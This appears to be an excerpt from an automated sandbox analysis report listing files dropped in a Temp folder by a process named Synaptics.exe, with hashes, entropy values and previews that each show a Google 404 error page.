                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\P4VEhHt.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.262964380102481
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0IvISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+xI+pAZewRDK4mW
                                                                                                                                                                                        MD5:51F7A1C397697FA91901933EE28F5BBE
                                                                                                                                                                                        SHA1:2072F980A376F54EC21B1FE9BBBFD64D6FC3E0EE
                                                                                                                                                                                        SHA-256:63309B56610B17EA7BE56A15FCCCC5B5F9A4166ACFBCAB1308DCE3FB1B5FCB98
                                                                                                                                                                                        SHA-512:FBCDF6667485EDD0AC20DB01885520FEA2C7FB69315B5387F5DBB97A4596978911E3E6CF2F6CCB323BAD7B31F10154B4918E8C7C6BE0C74AAE105148A2A40D92
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="155mLdq7vIPO80lFDPuDtA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\P8DTp3J.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.260318912317467
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0uSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+Z+pAZewRDK4mW
                                                                                                                                                                                        MD5:0754CC63F39B78CFB1A47C85B6064763
                                                                                                                                                                                        SHA1:178DAB532C33E16B351B91E2765E8DF7E6627DD1
                                                                                                                                                                                        SHA-256:176DBEEBD203DFE06D62A16D3147D6A2F75468FC9026ED6EC0ED4C8593740515
                                                                                                                                                                                        SHA-512:421CDEC1D8D9CE4C58FBCBAF9CE9342BF7705102D42ABC748E7F63C0B1473D16D35C1D73DED70360D164829EA37D653891906F3D91D2C239D7E9751ED3BF6EE1
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="s85BL+0ROa02+xqBaErxQQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\PIQWRiA.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.263599805998584
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0ySU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+F+pAZewRDK4mW
                                                                                                                                                                                        MD5:562F95835D3EB65B3C523DAE37DAA0D5
                                                                                                                                                                                        SHA1:1EEEDC9451449020D87AC3AE1CA867A205D3454E
                                                                                                                                                                                        SHA-256:F4E8FE7AA8D9A5DA0634ABAA158A3A55FDE3F133BA9F97212292DB19CECFD85E
                                                                                                                                                                                        SHA-512:CA0B1FF5B5FF2742C0843DCA25CD709464CA62BA703B83F4619223156473EC34F514CE14E3720DA23939A159648AF228A05C7BB025E3FC2FCCA1C73D7B3C9B6A
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5aMFhd493GFvK3GMxSUjrw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\PVAODYP.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.262881375350654
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0BvSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+u+pAZewRDK4mW
                                                                                                                                                                                        MD5:9C372EFE59F5F0EEEDFD8CD6E92F86E3
                                                                                                                                                                                        SHA1:D0C597B0E372CB7659A6D1E2E409CFD7CE5F759E
                                                                                                                                                                                        SHA-256:C7ED63349B420B0E9381BA4154B8D259B97DF0738FD1251043739FE37BA44E63
                                                                                                                                                                                        SHA-512:C95FC2CD659BD3AB1C9324B3B09857A0DF0CCB0156985536F04AF4249F10E47682C43C3A6F80EC45C949DB3CCD5EC7BBC216E9C3B9E0944385D1A9CC67B1477B
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="+X731/GjgmBPf/BJ17d7cA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Pg6NqzV.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.258120328004934
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0JSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+K+pAZewRDK4mW
                                                                                                                                                                                        MD5:074EEFB49CD4A94F4D8DA13564330D10
                                                                                                                                                                                        SHA1:33CA6FA04064AA625D8BC86B734118D8AF51577B
                                                                                                                                                                                        SHA-256:6AAB0C5E598786282FC0DE0CE06D642C1279CFA1E5D54FE43A7B8207B90C45CF
                                                                                                                                                                                        SHA-512:3CA0C97E40CA6D678F9BE0C5DDBFF542DF5450ED98D21FFA1C6F1AB33F1A684570805BFDF126ABCD90E693119569BBCAE9A2D6CA59575E2588291535738DE42A
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Bd1aSNRJ8zerT0TGnja+Lg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\PhlW3nR.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.280844375206115
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0/wPSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+3P+pAZewRDK4mW
                                                                                                                                                                                        MD5:07232F87B157143416FFC03B0B3DFD38
                                                                                                                                                                                        SHA1:3B3F26021D8916658C5ED07828B21A4DBE18B45E
                                                                                                                                                                                        SHA-256:63C4802CF6EE0AA93404AB546003DDB46D2578B16578FADB90A0C6C2CAD1B839
                                                                                                                                                                                        SHA-512:F1BE04C99B67141BA2C30CD7ADE53C5E99415014183B4886A9591E5C6EEFA4DD93802CC79BCE0D1073C7AF375B73C4A59E9AF94138441EF6B10F56111011DF59
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="DfBFU/sTlUIsAFWJXEACYQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\PpS3WPV.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.257953127802281
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0kgSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+Dg+pAZewRDK4mW
                                                                                                                                                                                        MD5:CB54BF47A1079C10B19F4F33D6AAFBF8
                                                                                                                                                                                        SHA1:7F6F01BE30A00F5616DCF36835EAC4A41C785AE2
                                                                                                                                                                                        SHA-256:DE76F2AE857CD593786D6DE30012D4473F1E4A45CAC138B085A4E01061704F51
                                                                                                                                                                                        SHA-512:D2BBE23F037CFC258E53E5242A45F09FA21CD59514FC9D2A1855A274803610DBE63E87BB9456B5C95D693DE815BAF6DFE0B5E6A6B77CC6651138187718DEF87D
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="oE/C/FtNK+VCslXGnZmc5w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\PskYLcJ.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.269440278839578
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0gnSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+9+pAZewRDK4mW
                                                                                                                                                                                        MD5:91374D1859FB3DA9F809B20964632E0C
                                                                                                                                                                                        SHA1:ABDF95C021E6B535A68DA4A1988CA68E73EA3817
                                                                                                                                                                                        SHA-256:1D190FB622D506B1CCFC48D17AF460F68807BD3E284CB86F3F304B4D12A62F6F
                                                                                                                                                                                        SHA-512:63EBBA296CEF6B4B90912AB571ADDD6B310A34DAF2B3BF1FA85598B76201D2F78C90F6317C06DFA1987F302AEE8D468BA5CAC0F4EB30B991A361DDCAF29B272D
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="iC2jzLQD9NvsaTUPUD5l7A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Q1Zi6dI.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.251000912739245
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0G8DSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+u+pAZewRDK4mW
                                                                                                                                                                                        MD5:67C5C552FA59F2B8068AE627A68B898B
                                                                                                                                                                                        SHA1:A64F235D62350E528456265C6CCF3F21F2187578
                                                                                                                                                                                        SHA-256:6E1DA0C2B44804533B2D2A161C57C882047D8A80B69E7C3B2E660C07B757D3D1
                                                                                                                                                                                        SHA-512:6930AE99F07821C7B540E45DA0D020C054F1A3148CFF6C4480DF9BBF8EF04312C7ACF1B5B7B0A38273592BAF6A981AFC65D5E34005CE6D02E44BE6028A1B39F8
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="moUaKvrgJw9A3q3trPnwlQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\QNNvBWZ.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.2445562554907665
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0WLPzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+HLPz+pAZewRDK4mW
                                                                                                                                                                                        MD5:5430F71F2BE61B884ED55465FE1E7B51
                                                                                                                                                                                        SHA1:49A4B1C18D66E74B29E877B92D14CC5CBD57CA5C
                                                                                                                                                                                        SHA-256:BF12E58CEA3134B306AFB90F829729C2BAE65F7457AD2EE3D4D131C69CAD6748
                                                                                                                                                                                        SHA-512:C9C9C8F68885F679B33245DD972A2AC912E75686182300E03FCDF9E506DBBE91C31A771A88A8061B0F77995C2C7B0B6580C5137A77F7AD0EC4A8C16A25C05F8A
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ddncaSD6acurDC1p2yotvQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\QPBQfwP.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.266358523069951
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0VASU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+0A+pAZewRDK4mW
                                                                                                                                                                                        MD5:6FA9487F08743FEFEA10501636786471
                                                                                                                                                                                        SHA1:F70A8D8492B42C4B1174818BF222B3B718CDAADD
                                                                                                                                                                                        SHA-256:80A58F823DA6394F6E83015C56DE563DEE56ACC81DD354B673F7BF38CE52C00E
                                                                                                                                                                                        SHA-512:2E1922310B5DA3E70C3FE02C58DD88E712F54F8F24B4F5B3E1F681898FE6C38B47CDA8E66ABEFA47CE4C7E06EDEFF78D18F1A718C7CE9FACDCDD1C31DB2A41E8
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="3cC4ROzNFUjpVIlq3aynjw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\QjYfK24.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.259630566774686
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0mDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+V+pAZewRDK4mW
                                                                                                                                                                                        MD5:E1F1AC3CF819362D93B5C92AEC8643A8
                                                                                                                                                                                        SHA1:DAC363DF233A1D2501DD8191D292B05435CC8B27
                                                                                                                                                                                        SHA-256:7D4907F075272459A8F3322328E4A7C4227E9EAFA0C8539682EC3C47F11C55F6
                                                                                                                                                                                        SHA-512:14C1C9FBCD8811FD24A7F4256C7376D6C3B5E165F980DF0DEE30C0DA109370455FFA56423EC8506882D6F3071467E36C81FF5294152E685C134A11267DFEFB2F
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WDfNF4dSmf4+uLfig/JvdA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Qjq6gY9.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.26349226633857
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0IAWSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+tH+pAZewRDK4mW
                                                                                                                                                                                        MD5:34EDD867A7854261F36E0A161C3F81C4
                                                                                                                                                                                        SHA1:6F64FEAE0E5D2D9E7693AE9CA1EADE5FBC7C9C73
                                                                                                                                                                                        SHA-256:504046CEBECF6FB73E5CE43B31BB603E7234242A1DEF31E499432FE764672E1C
                                                                                                                                                                                        SHA-512:F468B2CF0E5293E9D77BE66EEA02967090F98EB5EF437DE67D5A2CBDCDC9657A3E9BE2743A84EA2F5946D7F115490FE6848E747012B65263110B46A2EAAD0F61
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zdWTIzmqbGMfXFTeUquJrg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\QkAkPMK.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.264299543663466
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0iRSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+TR+pAZewRDK4mW
                                                                                                                                                                                        MD5:9B00327C285413F5493C2CF1B7DE58DB
                                                                                                                                                                                        SHA1:F397819A4E74E403A5C88996E8B266E3FEFF9A87
                                                                                                                                                                                        SHA-256:BAB3200E568B43A87AC649D9CA29AECCF31837FBD8DA335DE3F6783035C608F4
                                                                                                                                                                                        SHA-512:686BB68207080ED11C984E4094E55EFB9CE5D2CCA4EC88FC9410D794A0C1C38969592EDB7026A6E422AD66651A67D0514721DAC356876AF603E399749CF487AF
                                                                                                                                                                                        Malicious:false
